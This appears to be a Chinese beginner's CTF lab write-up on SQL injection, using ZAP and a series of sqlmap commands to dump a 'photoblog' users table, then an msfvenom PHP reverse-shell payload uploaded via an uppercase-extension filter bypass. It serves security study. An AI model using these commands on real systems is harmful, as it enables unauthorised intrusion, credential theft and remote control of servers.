小白学习CTF第六天-web安全sql注入

web安全sql注入

sql注入介绍

在这里插入图片描述

信息探测

在这里插入图片描述
这里的基本操作与之前的没有什么出入,
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

深入挖掘

在这里插入图片描述
深入挖掘,之后我们发现了一个敏感的网址/admin/login.php
在这里插入图片描述
打开之后,我们发现了一个类似的登录界面,这个时候,我们尝试使用弱口令,发现无法登陆,那我们就要去找用户名和密码了:

漏洞扫描

使用owasp-zap这个非常好用的漏洞扫描器:
在这里插入图片描述
打开owasp-zap:
在这里插入图片描述
对靶场进行攻击:
在这里插入图片描述
进行自动扫描,之后我们分析扫描结果:
在这里插入图片描述
我们发现了一个高危漏洞:sql注入
在这里插入图片描述

漏洞利用

接下来我们就要利用这个sql注入漏洞进行攻击:
在这里插入图片描述

http://192.168.56.107/cat.php?id=3-2

sqlmap -u "http://192.168.56.107/cat.php?id=3"

sqlmap -u "http://192.168.56.107/cat.php?id=3" --dbs

sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" --tables

sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" -T "users" --colunns

sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" -T "users" -C "login,password" --dump

我们把扫描结果的URL进行复制:
在这里插入图片描述
登陆之后我们发现了类似界面,这样我们可以以后利用这个页面
在这里插入图片描述
接下来我们开始准备获取用户名以及密码:
在这里插入图片描述
查看可能利用的错误输入造成sql注入:
在这里插入图片描述
查看所存在的数据库:
在这里插入图片描述
查看photoblog数据库中的表:
在这里插入图片描述
接下来准备进行密码破解:
在这里插入图片描述
在这里插入图片描述
我们得到了用户名以密码。
使用得到的用户名以及密码之后我们登陆成功了!!!
在这里插入图片描述

上传shell反弹权限

在这里插入图片描述
生成一个webshell:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.104 lport=4444 -f raw

在这里插入图片描述
保存webshell到桌面上:
在这里插入图片描述
设置对应的参数
在这里插入图片描述
之后我们上传对应webshell.php(注意这里可能对.php有过滤机制,这个时候我们可以使用.PHP来绕过过滤机制)
.php->.PHP
在这里插入图片描述
上传完对应的文件,之后记得点击对应的文件使其执行,我们才可以反弹回对应的权限。
这个时候就会反弹回对应的权限:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
我们拿下了靶场,这个靶场设置的没有flag,就是为了学会sql注入而设计的。
ok!!!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值